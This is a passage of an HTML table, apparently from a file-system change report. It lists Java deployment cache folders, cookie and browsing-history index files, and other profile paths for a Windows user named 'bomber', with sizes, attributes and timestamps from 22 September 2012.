<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\26</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\27</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\28</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\29</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\3</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\30</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\31</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\32</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\33</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\34</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\35</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\36</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\37</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\38</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\39</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\4</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\40</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\41</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">34KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:27 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\42\32fd55ea-33417afb.idx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:27 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\43</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\44</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\45</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\46</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\47</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\48</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\49</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\5</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\50</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\51</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\52</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\53</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\54</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\55</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\56</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\57</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\58</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\59</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\6</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\60</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\61</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\62</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\63</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\7</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\8</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\9</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\host</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:27 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\muffin</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\tmp</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\deployment.properties</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:23 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\ext</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\log</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\0</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\10</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\11</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\12</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\13</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\14</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\SystemCache\6.0\15</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Cookies\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:05 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:01 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Feeds Cache\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:43 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:34 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:43 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:35 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\A9JWFLPR\www.google[1].xml</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:54 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:05 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td><span style="color: black; font-size: xx-small;">HA</span></td>
<td><span style="color: black; font-size: xx-small;">HA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:23 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:45 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML</span></td>
<td><span style="color: black; font-size: xx-small;">13KB</span></td>
<td><span style="color: black; font-size: xx-small;">13KB</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 11:35:30 AM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:25 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\History\History.IE5\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">66KB</span></td>
<td><span style="color: black; font-size: xx-small;">66KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:25:05 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:01 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\History\History.IE5\MSHist012012092220120923\index.dat</span></td>
<td><span style="color: black; font-size: xx-small;">50KB</span></td>
<td><span style="color: black; font-size: xx-small;">50KB</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">HSA</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:16:43 PM</span></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
